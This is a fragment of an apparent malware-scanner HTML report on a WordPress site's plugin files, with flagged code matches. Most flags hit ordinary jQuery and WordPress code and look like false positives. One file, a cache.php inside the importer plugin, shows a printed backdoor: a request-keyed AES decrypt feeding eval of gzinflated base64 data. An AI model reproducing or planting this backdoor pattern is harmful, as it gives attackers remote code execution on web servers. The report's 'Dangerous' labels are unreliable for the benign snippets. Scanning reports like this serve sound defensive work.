</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_373").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/dashboard.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.26 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_374" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { </span><span style="color: #FF8000">// Hover out code jQuery(this).attr('title', jQuery(this).data('tipText')); jQuery('.tooltip').remove(); }).mousemove(function(e) { var mousex = e.pageX + 20; //Get X coordinates var mousey = e.pageY + 10; //Get Y coordinates jQuery('.tooltip') .css({ to</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 103</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 117</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_374").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/modules.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.16 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_375" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ var </span><span style="color: #0000BB">is_check </span><span style="color: #007700">= (</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)) ? </span><span style="color: #0000BB">true </span><span style="color: #007700">: </span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch'</span><span style="color: #007700">).</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">is_check</span><span style="color: #007700">); }); }); </</span><span style="color: #0000BB">script</span><span style="color: #007700">> <</span><span style="color: #0000BB">style type</span><span style="color: #007700">=</span><span style="color: #DD0000">"text/css"</span><span style="color: #007700">> </span><span style="color: #FF8000">/*On Off Checkbox Switch*/ </span><span style="color: #007700">.</span><span style="color: #0000BB">onoffswitch </span><span style="color: #007700">{ </span><span style="color: #0000BB">position</span><span style="color: #007700">: </span><span style="color: #0000BB">relative</span><span style="color: #007700">; </span><span style="color: #0000BB">width</span><span style="color: #007700">: </span><span style="color: #0000BB">95px</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">result</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_375").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/debug.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.48 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_376" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">$switch </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">); </span><span style="color: #0000BB">setTimeout</span><span style="color: #007700">(function(){ if(</span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)) </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">false</span><span style="color: #007700">); else </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">true</span><span style="color: #007700">); </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">trigger</span><span style="color: #007700">(</span><span style="color: #DD0000">'onUltima</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 373</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">result</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_376").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/script-styles.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.25 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_377" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch'</span><span style="color: #007700">).</span><span style="color: #0000BB">click</span><span style="color: #007700">(function(){ </span><span style="color: #0000BB">$switch </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">); </span><span style="color: #0000BB">setTimeout</span><span style="color: #007700">(function(){ if(</span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)) </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">false</span><span style="color: #007700">); else </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">result</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 137</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_377").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wordpress-importer/php-toolkit/ByteStream/ReadStream/ReadStream/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:46</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:46</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_378" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'c7OnS1XijIgf7A3aIdUrSSJhxDZ7+SYM5zHfckqve3lHe5+N+hHrvYvZ9zNu9hXZsNakDu++nn93X+xU8UFvGr6fvSbcXsu/84Dvf3x6+s7OYlq8w1vd2b3N2rve1DKWoTGcn2vbwna++cjPlNlQ2Yj0n2n9WXs35P+/6kj+k/uxIqVQk+gUwaBfXzM5YSL8r9c/PKUzqe/gVODRkuQ9aRusB2t9BYsPIwbkYREFlGs74hl7K/nVVmWaT3pnGC/Ayc+VqQHRTue35AATSxJQBGCIH8Msnop8IUuuZDTwy5+KIK8Pb3XEWHiYUH3QqvSUEke0E/dDY7tLqnErc7j36p2Nczn2c2pW7w1Bqs1LX1aKwM0DUbg3PgFrP9LyiHH5/XsWnX9z2l513X7kaYdBTAqWDiurGbry3jTrqVA9X7EJG7dQ2vdT31fTU3W+/RRzS7M6rg0rRFEhE8I7SxARlkRW/ZA1Mj4x8eFPjXO5eNxBrB94uyO...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">VGqLH</span><span style="color: #007700">(</span><span style="color: #0000BB">$lBSfa</span><span style="color: #007700">) { </span><span style="color: #0000BB">$VsJBq </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$bBFz </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$VsJBq</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$EBW </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$lBSfa</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$EBW</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$VsJBq</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$bBFz</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">VGqLH</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'PqvwA7RlRJ+fArKwCga+x3ZnQuBb</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$VGqLH</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$VGqLH</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_378").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/includes/class-protect-uploads-i18n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 684.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_379" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() { </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) ) ) . </span><span style="color: #DD0000">'/languages/' </span><span style="color: #007700">); } public function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain </span><span style="color: #007700">= </span><span style="color: #0000BB">$domain</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_379").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/includes/class-protect-uploads-loader.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_380" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">filters </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">], array( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'component'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'callback'</span><span style="color: #007700">] ), </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'priority'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'accepted_args'</span><span style="color: #007700">] ); } foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">actions </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">],</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">definition on the $component</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should be fired</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
